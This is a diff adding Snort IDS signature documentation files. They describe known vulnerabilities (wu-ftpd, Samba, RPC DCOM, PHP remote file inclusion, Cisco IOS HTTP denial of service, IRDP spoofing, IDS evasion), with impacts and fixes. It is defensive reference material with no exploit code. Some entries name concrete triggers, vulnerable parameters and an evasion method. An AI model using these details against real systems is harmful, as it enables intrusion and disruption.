+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/3444.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+3444
+
+--
+Summary:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Affected Systems:
+	NA
+
+--
+Attack Scenarios:
+NA
+
+--
+Ease of Attack:
+NA
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+NA
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/502.txt
@@ -0,0 +1,71 @@
+Rule:  
+
+--
+Sid:
+502
+
+--
+Summary:
+This event is generated when an IPv4 packet set the strict source record
+route IP option.
+
+--
+Impact:
+Information could be gathered about network topology, and machines
+routing packets onto trusted links could be abused.
+
+--
+Detailed Information:
+Strict source record routing specifies a series of machines which must 
+be exclusively used in the routing of a datagram.  This can be useful to
+map out routes ala the traceroute program by adding discovered 
+intermediary routers one at a time.  Furthermore, while a machine may 
+normally be unreachable due to default gateways, a compliant router can 
+be forced to hand off source routed packets to an intermediary capable 
+of speaking both to the outside world and target machines; the packet 
+may then be forwarded on to its destination.
+
+--
+Affected Systems:
+Any machine fully implementing RFC 791 set up as a router.
+
+--
+Attack Scenarios:
+By incrementing the TTL of successive packets, the topology of routes to
+a host can be determined.  Each compliant node along the way will reply
+with an ICMP Time Exceeded bearing their address and the recorded route.
+
+--
+Ease of Attack:
+Tools are readily available to employ source routing for the purpose of
+network discovery; the bounce attack described is unlikely to surface in
+a properly configured network.
+
+--
+False Positives:
+None
+
+--
+False Negatives:
+Network discovery can be done using other means than source routing.
+
+--
+Corrective Action:
+Redesign network topologies so that routers are kept to a minimum;
+disable routing by other machines.  To prevent network mapping, don't
+allow source-routed packets at all. 
+
+--
+Contributors:
+Snort documentation contributed by by Nick Black, Reflex Security <dank@reflexsecurity.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+IP RFC:
+www.faqs.org/rfcs/rfc791.html
+
+--
--- /dev/null
+++ b/doc/signatures/342.txt
@@ -0,0 +1,62 @@
+SID:
+342
+--
+
+Rule:
+--
+
+Summary:
+This event is generated when an attack attempt is made against an ftp 
+server possibly running a vulnerable ftpd on Solaris 8
+
+--
+
+Impact:
+Possible remote execution of commands on the affected server as the root user
+--
+
+Detailed Information:
+The Washington University ftp daemon (wu-ftpd) does not perform proper 
+checking in its SITE EXEC implementation, and allows user input to be 
+sent directly to printf. This allows an attacker to overwrite data and 
+eventually execute code on the server.
+
+--
+
+Affected Systems:
+Any system running wu-ftpd 2.6 .0 or below
+--
+
+Attack Scenarios:
+A remote attacker will attempt to execute commands on the ftp server 
+with root user privileges, over writing or modifying system files. This 
+can be done with anonymous and real user logins.
+--
+
+Ease of Attack:
+Simple, Exploit code exists
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Upgrade to latest version which has fixes for this problem. Maybe even get rid of wu-ftp with something more secure.
+Restrict access to ftp at the firewall to known hosts only
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/3018.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3018
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/363.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+363
+
+--
+Summary:
+This event is generated when an external server sends an ICMP IRDP router advertisement message to an internal server. This may indicate an attempt to cause a denial of service by adding spoofed router information to an IRDP-enabled host's routing table.
+
+--
+Impact:
+Denial of service. 
+
+--
+Detailed Information:
+The ICMP Router Discovery Protocol (IRDP) is enabled by default on some Microsoft Windows and Sun Solaris operating systems. IRDP messages broadcast network routing information, and computers with IRDP enabled will store this routing information in their default routing tables. There is no way to determine whether the IRDP broadcast is authentic or spoofed, and some hosts will use the routes that appear in their local routing tables before using routes discovered via DHCP.
+
+An attacker can exploit this behavior by broadcasting IRDP messages with erroneous routing information to a target network. This will cause some IRDP-enabled hosts on that network to route traffic through the route advertised in the spoofed IRDP message. If the spoofed IRDP message contains nonexistent/inaccessible routing addresses, the target will not be able to connect to external networks, causing a denial of service. This may also facilitate man-in-the-middle attacks or interception of data by an attacker.
+
+Note that if an attacker is on the internal network, he/she can use valid routing addresses in the spoofed IRDP messages to passively monitor other machines or to perform "man-in-the-middle" attacks.
+
+--
+Affected Systems:
+Microsoft Windows 95
+Microsoft Windows 98
+Microsoft Windows 98SE
+Sun Solaris 2.6
+
+--
+Attack Scenarios:
+An attacker crafts spoofed IRDP broadcast messages and forwards them to a target network. If the messages are not filtered by the firewall and are broadcast to the internal network, some IRDP-enabled hosts begin routing traffic through the routes advertised in the IRDP broadcast message, which can cause a denial of service condition.
+
+--
+Ease of Attack:
+Simple. A proof-of-concept exists.
+
+--
+False Positives:
+This rule may generate an alert if legitimate ICMP traffic of type 9 is sent from an external server to an internal server.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+For vulnerable Windows computers, disable IRDP on the system (see http://support.microsoft.com/support/kb/articles/q216/1/41.asp).
+
+For vulnerable Solaris 2.6 computers, install the patch provided by Sun (see http://sunsolve.sun.com/pub-cgi/show.pl?target=patches/patch-access).
+
+Use a packet filtering firewall to block ICMP type 9 packets from entering the internal network.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>.
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+Additional information from Anton Chuvakin <http://www.chuvakin.org>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0875
+
+Arachnids:
+http://www.whitehats.com/info/IDS174
+
+Bugtraq:
+http://www.securityfocus.com/bid/578
+
+RFC:
+http://www.cotse.com/CIE/RFC/Orig/rfc1256.txt
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000464.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000464
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "LoveCompass AEPartner" application running on a 
+webserver. Access to the file "design.inc.php" using a remote file being passed 
+as the "dir[data]" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "dir[data]" parameter in the "design.inc.php" script 
+used by the "LoveCompass AEPartner" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using LoveCompass AEPartner
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3219.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3219
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2421.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2421
+
+--
+Summary:
+This event is generated when an attempt is made to download a file that
+may be an attack vector for a known exploit to a vulnerability in Real 
+Networks RealPlayer/RealOne player.
+
+--
+Impact:
+Serious. Execution of arbitrary code.
+
+--
+Detailed Information:
+RealNetworks RealPlayer/RealOne player is a streaming media player for
+Microsoft Windows, Apple Macintosh and UNIX/Linux based operating systems.
+
+A buffer overrun condition is present in some versions of the player
+that may present a remote attacker with the opportunity to execute code
+of their choosing on a client using one of these players.
+
+--
+Affected Systems:
+	Real Networks RealOne Desktop Manager
+	Real Networks RealOne Enterprise Desktop 6.0.11 .774
+	Real Networks RealOne Player 1.0
+	Real Networks RealOne Player 2.0
+	Real Networks RealOne Player 6.0.11 .868
+	Real Networks RealOne Player version 2.0 for Windows
+	Real Networks RealPlayer 8.0 Win32
+	Real Networks RealPlayer 8.0 Unix
+	Real Networks RealPlayer 8.0 Mac
+	Real Networks RealPlayer 10.0 BETA
+
+--
+Attack Scenarios:
+An attacker may supply a malformed file to the client to exploit the
+issue.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3388.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3388
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1019.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1019
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2045.txt
@@ -0,0 +1,94 @@
+Rule:
+
+--
+Sid:
+2045
+
+--
+Summary:
+The snmpXdmi daemon is used on Sun Solaris systems to map Simple Network
+Management Protocol (SNMP) management requests to and from the Desktop 
+Management Interface (DMI).
+
+This daemon contains a boundary condition error that could result in a 
+buffer overflow that will present the attacker with super user access to
+the target host.
+
+--
+Impact:
+Complete control of the target machine.
+
+--
+Detailed Information:
+The snmpXdmi daemon is installed and enabled by default on the affected 
+systems below.
+
+DMI is used to manage components on client machines across a network. It
+can be used in conjunction with SNMP via a daemon such as snmpXdmi.
+
+A number of exploits for this vulnerability exist and are in use. The result of a sucessful attack is a complete root compromise of the victim host.
+
+Compromised systems are reported to display a number of commonalities such as:
+
+	A core file for snmpXdmi on /
+	Two instances of inetd running
+	Telnet and SSH backdoors running on high ports
+	An instance of an IRC proxy
+	System binaries replaced by rootkit versions
+	Network sniffers installed
+	Log files changed
+
+The system binaries 'ps' and 'netstat' cannot be trusted to show all 
+running processes since they may have been replaced by rootkit versions 
+specially modified so as to hide evidence of the compromise.
+
+--
+Affected Systems:
+Sun Solaris 2.6, 7.0, 8.0 for SPARC and Intel architectures
+
+--
+Attack Scenarios:
+The attacker must send specially crafted packets to the snmpXdmi daemon 
+or use one of the widely available exploits.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the snmpXdmi service.
+
+Apply the appropriate patches for each affected system.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2417
+
+CERT:
+http://www.cert.org/advisories/CA-2001-05.html
+http://www.kb.cert.org/vuls/id/648304
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0236
+
+--
--- /dev/null
+++ b/doc/signatures/100000518.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000518
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "PHP Live Helper" application running on a 
+webserver. Access to the file "initiate.php" using a remote file being passed 
+as the "abs_path" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "abs_path" parameter in the "initiate.php" script used 
+by the "PHP Live Helper" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHP Live Helper
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/111-16.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+111-16
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may be an IDS evasion attempt.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected a TCP session that contains
+retransimitted data without the necessary retransmission request. This
+may be an attempt to evade any monitoring IDS.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker could supply two packets containing different data, one with
+a malicious payload destined for a vulnerable host and the other with a
+benign payload meant for the IDS. The second packet may disguise itself
+in the session as retransmitted data.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/512.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+512
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to a PC
+running pcAnywhere
+
+--
+Impact:
+Serious. By the very nature of pcAnywhere, without a strong administrative
+password, a successful attack will allow the attacker to gain total 
+control of the machine.
+
+--
+Detailed Information:
+pcAnywhere is a remote control administrative software package produced 
+by Symantec (http://www.symantec.com/pcanywhere/Consumer/features.html) 
+it allows control of a system via network or RAS connection.
+
+--
+Affected Systems:
+	Windows XP Home and Professional
+	Windows 2000 Professional/Server
+	Windows NT Workstation and Server 4.0
+	Windows 98/Me
+
+--
+Attack Scenarios:
+With a copy of pcAnywhere, and attacker can scan a network (port 22) or
+war-dial a series of modems, looking for pcAnywhere signatures.
+
+--
+Ease of Attack:
+Simple. All that is required is an install of pcAnywhere and a host
+to connect to.
+
+--
+False Positives:
+Since pcAnywhere uses the same port as SSH (22) a simple open port scan 
+can show hosts that my not have pcAnywhere installed
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Make sure only servers and workstations that require remote control have
+pcAnywhere installed.
+Make sure that a strong password is required for any level of access, 
+this ideally should be coupled with some for of alternate 
+authentication, such as SecurID, modem callback or be blocked at the 
+external firewall so that the remote control functionality is only 
+available on the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by  Mike Rivett ebiz@rivett.org
+
+-- 
+Additional References:
+Symantec PC Anywhere Home Page
+http://www.symantec.com/pcanywhere/Consumer/
+
+RSA:
+RSA SecurID (www.rsasecurity.com/products/securid/)
+
+Arachnids:
+http://www.whitehats.com/info/IDS240
+
+--
--- /dev/null
+++ b/doc/signatures/100000610.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000610
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_checkurl.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"link_checkurl.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3002.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid:
+3002
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Microsoft implementation of the ASN.1 Library.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the Microsoft implementation of the ASN.1 
+Library. It may be possible for an attacker to exploit this condition by 
+sending specially crafted authentication packets to a host running a 
+vulnerable operating system.
+
+When the taget system decodes the ASN.1 data, exploit code may be included 
+in the data that may be excuted on the host with system level privileges. 
+Alternatively, the malformed data may cause the service to become 
+unresponsive thus causing the DoS condition to occur.
+
+--
+Affected Systems:
+	Microsoft Windows NT
+	Microsoft Windows NT Terminal Server Edition
+	Microsoft Windows 2000
+	Microsoft Windows XP
+	Microsoft Windows 2003
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0818
+
+US-CERT
+http://www.us-cert.gov/cas/techalerts/TA04-041A.html
+
+Microsoft
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp
+
+--
--- /dev/null
+++ b/doc/signatures/100000129.txt
@@ -0,0 +1,89 @@
+Rule: 
+
+--
+Sid: 
+100000129
+
+-- 
+Summary: 
+This event is generated when a malformed URL is sent to a Cisco IOS HTTP 
+Router, which may cause a denial of service.
+
+-- 
+
+Impact: 
+If a router running a vulnerable version of the IOS HTTP server receives this 
+request, it will fall into an infinite loop, causing a denial of service. The 
+router will restart after two minutes, when the system's watchdog timer 
+realizes that the router has become unresponsive.
+
+--
+Detailed Information:
+If a "?" character immediately follows a "/" character in a URI, vulnerable 
+versions of the Cisco IOS HTTP Router will fall into an infinite loop, causing 
+a denial of service. The router will restart after two minutes, when the 
+system's watchdog timer realizes that the router has become unresponsive.
+
+
+--
+Affected Systems:
+Cisco IOS 12.0 XJ
+Cisco IOS 12.0 XH
+Cisco IOS 12.0 XE
+Cisco IOS 12.0 XA
+Cisco IOS 12.0 W5
+Cisco IOS 12.0 T
+Cisco IOS 12.1 XP
+Cisco IOS 12.1 XL
+Cisco IOS 12.1 XJ
+Cisco IOS 12.1 XI
+Cisco IOS 12.1 XH
+Cisco IOS 12.1 XG
+Cisco IOS 12.1 XF
+Cisco IOS 12.1 XE
+Cisco IOS 12.1 XD
+Cisco IOS 12.1 XC
+Cisco IOS 12.1 XB
+Cisco IOS 12.1 XA
+Cisco IOS 12.1 T
+Cisco IOS 12.1 EC
+Cisco IOS 12.1 E
+Cisco IOS 12.1 DC
+Cisco IOS 12.1 DB
+Cisco IOS 12.1 DA
+Cisco IOS 12.1 AA
+Cisco IOS 12.1
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited with a web browser or a script.
+
+-- 
+
+Ease of Attack: 
+Simple, as it can be exploited using a web browser.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Apply the vendor-supplied patch, available at Cisco.com. As a workaround, the 
+IOS HTTP server may be disabled by using the command "no ip http server".
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000598.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000598
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "inv_delete.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "inv_delete.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000748.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000748
+--
